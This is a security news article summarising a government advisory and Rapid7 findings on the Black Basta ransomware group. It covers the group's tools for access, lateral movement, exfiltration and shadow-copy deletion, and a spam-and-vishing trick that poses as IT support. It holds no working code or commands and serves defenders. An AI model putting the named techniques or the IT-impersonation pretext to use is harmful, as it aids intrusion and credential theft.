Black Basta target orgs with new social engineering campaign

Black Basta, one of the most prolific ransomware-as-a-service operators, is trying out a combination of email DDoS and vishing to get employees to download remote access tools.

Black Basta TTPs and newest initial access attempts

According to a cybersecurity advisory published on Friday by CISA, the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), Black Basta used/uses:

  • Qakbot, spearphishing, exploits vulnerabilities and valid credentials for initial access
  • The SoftPerfect network scanner for network scanning
  • BITSAdmin, PsExec, RDP, Splashtop, Screen Connect, Cobalt Strike beacons for lateral movement, and Mimikatz for privilege escalation
  • Exploits for vulnerabilities such as ZeroLogon, NoPac, and PrintNighmare for local and Windows Active Domain privilege escalation
  • RClone and WinSCP for data exfiltration, PowerShell to disable antivirus products, Backstab to disable endpoint detection and response (EDR) tools
  • The vssadmin program to delete volume shadow copies (before encrypting files)

The advisory lists indicators of compromise associated with Black Basta ransomware attacks and offers advice for organizations.

Rapid7 analysts have also shared the latest social engineering trick by the Black Basta operators: they spam targets’ inbox with junk email, then phone them posing as a member of their organization’s IT team, and offer assistance. They ask the target to install a legitimate remote monitoring and management tool (e.g., AnyDesk) or start Quick Assist, a built-in Windows remote support utility.

If unsucessfult in their social engineering efforts with one target, they move onto the next.

“Once the threat actor successfully gains access to a user’s computer, they begin executing a series of batch scripts, presented to the user as updates, likely in an attempt to appear more legitimate and evade suspicion,” the analysts noted.

The scripts establish persistence, establish a reverse shell connection to a specified C2 server, harvest victim’s credentials from the command line using PowerShell.

“In most of the observed batch script variations, the credentials are immediately exfiltrated to the threat actor’s server via a Secure Copy command (SCP). In at least one other observed script variant, credentials are saved to an archive and must be manually retrieved,” they also added.

“In one observed case, once the initial compromise was completed, the threat actor then attempted to move laterally throughout the environment via SMB using Impacket, and ultimately failed to deploy Cobalt Strike despite several attempts. While Rapid7 did not observe successful data exfiltration or ransomware deployment in any of our investigations, the indicators of compromise found via forensic analysis conducted by Rapid7 are consistent with the Black Basta ransomware group based on internal and open source intelligence.”

Rapid7 advised organizations to block all unapproved RMM solutions from executing within the environment and to have established channels and methods employees can use to contact their IT department (and report suspicious emails and phone calls).

Who is Black Basta?

The Russian-speaking Black Basta group is believed to have been started by former members of the infamous Conti ransomware collective, which dissolved in May 2022.

Since then, Black Basta and its affiliates have hit over 500 organizations around the world, predominantly in North America, Europe, and Australia. They target businesses and organizations in critical infrastructure sectors (including healthcare).

In late 2023, Elliptic and Corvus Insurance pinpointed “at least $107 million in Bitcoin ransom payments to the Black Basta ransomware group since early 2022,” and said that blockchain transactions form a clear link between Black Basta and Conti.

Unlike some ransomware groups, Black Basta does not outright define the ransom amount to be paid. Instead, they tell the victim to contact them via a specified .onion URL to negotiate it.

Don't miss